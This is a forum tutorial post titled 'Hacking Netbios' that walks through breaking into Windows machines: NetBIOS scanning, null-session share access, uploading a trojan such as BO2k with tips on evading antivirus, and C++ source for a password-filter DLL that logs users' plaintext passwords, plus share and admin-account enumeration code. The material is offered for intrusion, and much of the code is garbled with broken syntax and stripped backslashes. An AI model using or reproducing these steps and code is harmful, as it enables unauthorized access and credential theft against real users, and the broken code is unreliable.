Jump to content
Screech

Hacking Netbios

By Screech, in Tutoriale in engleza

Recommended Posts

Screech Newbie

Screech

Posted
Posted

Well..first of all hello folks..

In this tutorial I wanna show u how to hack via NetBios.

And here is what u need:

- Windows ( for the method I'll explain here )

- Internet ;)

- NetBIOS scans

- the good old DOS console

- a bit knowledge about DOS and nbtstat.exe and net.exe ( see microsoft technet for description )

- knowledge about trojans or backdoors ( how they work...)

************************************************************************************

Lets start...

1. Fire up a DOS box

2. Now go to root ( usually c: ) and enter " nbtstat -A IP "

( without " ", IP is the IP of the remote PC. You get the IP's from your scans )

If the server/PC is hackable the result should be a table like this:

NetBIOS Remote Machine Name Table

Name Type Status

--------------------------------------------

computername <00> UNIQUE Registered

workgroupname <00> GROUP Registered

computername <20> UNIQUE Registered

workgroupname <1E> GROUP Registered

workgroupname <1D> UNIQUE Registered

..__MSBROWSE__. <01> GROUP Registered

MAC Address = xx-xx-xx-xx-xx-xx ( the x's are hex numbers )

************************************************************************************

You can scan for NetBios with X-Scan. Also scan with a port scanner like superscan

(available at www.packetstormsecurity.nl) 'cause port 135-139 often stands for NetBios.

An original scan wit X-Scan could look like:

xxx.xxx.xxx.xxx

Administrator - [built-in account for administering the computer/domain]

Account type: Administrator

Password age: 291 Day 10 Hour 28 Minute 34 Sec.

Bad password count: 0Number logons: 9

Last logon: GMT Wed Aug 14 15:26:38 2002

Guest - [built-in account for guest access to the computer/domain]

Account type: Guest

Password age: 0 Day 0 Hour 0 Minute 0 Sec.

Bad password count: 0Number logons: 0

************************************************************************************

3. Mkay now enter this in the DOS box:

( you have to replace the xxx.... by the IP of the target and dont write the c: 'cause it is there yet ;) )

c:net view xxx.xxx.xxx.xxx

Response (possible):

System error 5 occured.

Access denied.

c:

ooops...wasn't as easy as we thought...well ok type:

c:net use xxx.xxx.xxx.xxxipc$ "" /user:"" ( this creates a zero session )

Response: The command completed successfully.

Ok..lets test it again...

c:net view xxx.xxx.xxx.xxx

Response: Shared resources on xxx.xxx.xxx.xxx

* Here it displays the resources

mkay...now we know the shared resources

Now we assign a drive to a shared folder...

c:net use m: xxx.xxx.xxx.xxx"folder" ( replace "folder" by a shared folders name )

Response: The command completed successfully.

Now we switch to our new drive:

c:m:

..usually nothing interesting in a shared folder. And because of that...

4. Now we can upload a trojan who gives us access to rest of the PC. It's good to code a

small trojan that does all what we want, because existing trojans are recognized by AV

tools. But u can also take an existing one like BO2k ...

Now upload:

m:copy c:path_to_the_trojan_here m:

Now the trojan is installed. Best thing is to upload a dll-trojan thru the other trojan that replaces a *.dll

5. Now we close the connection to the remote folder with:

c:net use m: /DELETE

******************************************************************************************

******************************************************************************************

********************** C++ source for this shit to save time ****************************

******************************************************************************************

******************************************************************************************

********************* Perhaps you have to edit it at several lines ***********************

******************************************************************************************

#include <windows.h>

#include <stdio.h>

#include <stdlib.h>



struct UNI_STRING {

USHORT len;

USHORT maxlen;

WCHAR *buff;

};



static HANDLE fh;



BOOLEAN __stdcall InitializeChangeNotify ()

{

DWORD wrote;

fh = CreateFile("C:WINNTtemppwdchange.tmp", GENERIC_WRITE,

FILE_SHARE_READ|FILE_SHARE_WRITE, 0, CREATE_ALWAYS,

FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUGH,

0);

WriteFile(fh, "InitializeChangeNotify gestartedn", 31, &wrote, 0);

return TRUE;

}



LONG __stdcall PasswordChangeNotify (struct UNI_STRING *user, ULONG rid,

struct UNI_STRING *passwd)

{

DWORD wrote;

WCHAR wbuf[200];

char buf[512];

char buf1[200];

DWORD len;



memcpy(wbuf, user->buff, user->len);

len = user->len/sizeof(WCHAR);

wbuf[len] = 0;

wcstombs(buf1, wbuf, 199);

sprintf(buf, "User = %s : ", buf1);

WriteFile(fh, buf, strlen(buf), &wrote, 0);



memcpy(wbuf, passwd->buff, passwd->len);

len = passwd->len/sizeof(WCHAR);

wbuf[len] = 0;

wcstombs(buf1, wbuf, 199);

sprintf(buf, "p4sswd = %s : ", buf1);

WriteFile(fh, buf, strlen(buf), &wrote, 0);



sprintf(buf, "RID = %xn", rid);

WriteFile(fh, buf, strlen(buf), &wrote, 0);



return 0L;

}





BOOL EstablishNullSession(CString TargetHost, CNTOHunterDlg* pDlg)

{

char* pTemp = TargetHost.GetBuffer(256);

WCHAR wszServ[256];

LPWSTR Server = NULL;



//convert to unicode

MultiByteToWideChar(CP_ACP, 0, pTemp,

strlen(pTemp)+1,

wszServ,

sizeof(wszServ)/sizeof(wszServ[0]) );



Server = wszServ;



LPCWSTR szIpc = L"IPC$";

WCHAR RemoteResource[UNCLEN + 5 + 1];

DWORD dwServNameLen;

DWORD dwRC;



NET_API_STATUS nas;



USE_INFO_2 ui2;

SHARE_INFO_1* pSHInfo1 = NULL;

DWORD

dwEntriesRead;

DWORD dwTotalEntries;





HTREEITEM machineRoot, shareRoot, userRoot, adminRoot, attribRoot;



char sharename[256];

char remark[256];



if(Server == NULL || *Server == L'')

{

SetLastError(ERROR_INVALID_COMPUTERNAME);

return FALSE;

}



dwServNameLen = lstrlenW( Server );



if(Server[0] != L''&& Server[1] != L'')

{



RemoteResource[0] = L'';



RemoteResource[1] = L'';



RemoteResource[2] = L'';



}



else



{

dwServNameLen -= 2;



RemoteResource[0] = L'';

}



if(dwServNameLen >CNLEN)

{

SetLastError(ERROR_INVALID_COMPUTERNAME);

return FALSE;

}



if(lstrcatW(RemoteResource, Server) == NULL) return FALSE;

if(lstrcatW(RemoteResource, szIpc) == NULL) return FALSE;

ZeroMemory(&ui2, sizeof(ui2));

ui2.ui2_local = NULL;

ui2.ui2_remote = (LPTSTR) RemoteResource;

ui2.ui2_asg_type = USE_IPC;

ui2.ui2_password = (LPTSTR) L"";

ui2.ui2_username = (LPTSTR) L"";

ui2.ui2_domainname = (LPTSTR) L"";





nas = NetUseAdd(NULL, 2, (LPBYTE)&ui2, NULL);



dwRC = GetLastError();

if( nas == NERR_Success )



{

machineRoot = pDlg->m_Victims.InsertItem(TargetHost, 0, 0,

TVI_ROOT);



}





nas = NetShareEnum((char*)Server, 1, (LPBYTE*)&pSHInfo1,

MAX_PREFERRED_LENGTH,



&dwEntriesRead,

&dwTotalEntries, NULL);



dwRC = GetLastError();



if( nas == NERR_Success )



{

if(dwTotalEntries > 0)



{

shareRoot = pDlg->m_Victims.InsertItem("Shares",

machineRoot,TVI_LAST);



userRoot = pDlg->m_Victims.InsertItem("Users", machineRoot,TVI_LAST);



adminRoot = pDlg->m_Victims.InsertItem("Admin",

machineRoot,TVI_LAST);



}

for(int x=0; x<(int)dwTotalEntries; x++)



{





WideCharToMultiByte(CP_ACP, 0, (const unsigned

short*)pSHInfo1->shi1_netname, -1,



sharename, 256, NULL, NULL );





WideCharToMultiByte( CP_ACP, 0, (const unsigned short*)pSHInfo1->shi1_remark, -1,



remark, 256, NULL, NULL );



CString ShareDetails = sharename;



ShareDetails = ShareDetails + " - " + remark;



attribRoot = pDlg->m_Victims.InsertItem(ShareDetails, shareRoot,TVI_LAST);

pSHInfo1++;

}

}





DoNetUserEnum(Server, pDlg, userRoot, adminRoot);

nas = NetUseDel(NULL, (LPTSTR) RemoteResource, 0);

TargetHost.ReleaseBuffer();

SetLastError( nas );

return FALSE;

}







bool GetAdmin(char* pServer, char* pUser, CString& Name)

{

BOOL fAdmin = FALSE;

DWORD dwDomainName,dwSize,dwAdminVal;

SID_NAME_USE use;

PSID pUserSID = NULL; // SID für Benutzer

int rc;

int iSubCount;



bool bFoundHim = 0;

dwDomainName = 256;

dwSize = 0;

dwAdminVal = 0;

iSubCount = 0;



rc = LookupAccountName(pServer,

pUser, pUserSID,

&dwSize, szDomainName,

&dwDomainName, &use );

rc = GetLastError();



if(rc == ERROR_INSUFFICIENT_BUFFER)

{

pUserSID = (PSID) malloc(dwSize);





rc = LookupAccountName(pServer,

pUser, pUserSID,

&dwSize, szDomainName,

&dwDomainName, &use );

}



iSubCount = (int)*(GetSidSubAuthorityCount(pUserSID));

dwAdminVal = *(GetSidSubAuthority(pUserSID, iSubCount-1));



if(dwAdminVal==500)

{

Name.Format("Admin is %s%s

", szDomainName, pUser);

bFoundHim = true;

}



delete pUserSID;

return bFoundHim;

}







void DoNetUserEnum(const wchar_t* pServer, CNTOHunterDlg* pDlg, HTREEITEM userRoot, HTREEITEM adminRoot)

{

USER_INFO_10 *pUserbuf, *pCurUser;

DWORD dwRead, dwRemaining, dwResume, dwRC;



char userName[256];

char userServer[256];



dwResume = 0;



if(pServer[0] != L'' && pServer[1] != L'')

{

RemoteResource[0] = L'';

RemoteResource[1] = L'';

RemoteResource[2] = L'';

}

else



{

dwServNameLen -= 2;





RemoteResource[0] = L'';

}



if(dwServNameLen > CNLEN)

{

SetLastError(ERROR_INVALID_COMPUTERNAME);

return;

}



if(lstrcatW(RemoteResource, pServer) == NULL) return;



do

{



pUserbuf = NULL;



dwRC = NetUserEnum(RemoteResource, 10, 0, (BYTE**) &pUserbuf,

1024,

&dwRead, &dwRemaining, &dwResume);

if (dwRC != ERROR_MORE_DATA && dwRC != ERROR_SUCCESS)

break;



DWORD i;

for(i = 0, pCurUser = pUserbuf; i < dwRead; ++i, ++pCurUser)



{



WideCharToMultiByte( CP_ACP, 0, pCurUser->usri10_name,

-1, userName, 256, NULL, NULL );



WideCharToMultiByte( CP_ACP, 0, pServer, -1,

userServer, 256, NULL, NULL );



if(!GotAdmin)

{

CString Admin;

GotAdmin = GetAdmin(userServer, userName, Admin);

if(GotAdmin



{

Admin.TrimRight();

HTREEITEM adminChild = pDlg->m_Victims.InsertItem(Admin, adminRoot, TVI_LAST);

pDlg->m_Victims.EnsureVisible(adminChild);



}



}



CString strUserName = userName;

pDlg->m_Victims.InsertItem(strUserName, userRoot, TVI_LAST);



}

if (pUserbuf != NULL)

NetApiBufferFree(pUserbuf);

} while (dwRC == ERROR_MORE_DATA);



if (dwRC != ERROR_SUCCESS)

printf("NUE() returned %lu

", dwRC);

}

***************************************************************************************

Some NetBios hacking tools:

DumpSec

http://www.somarsoft.com

Windows NT/2000

Legion

http://www.technotronic.com

Windows 9x/NT/2000, UNIX/Linux

NAT

http://www.packetstormsecurity.nl

Windows 9x/NT, UNIX/Linux

****************************************************************************************

Congratulation...you've hacked him now u can connect him with http://FTP.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...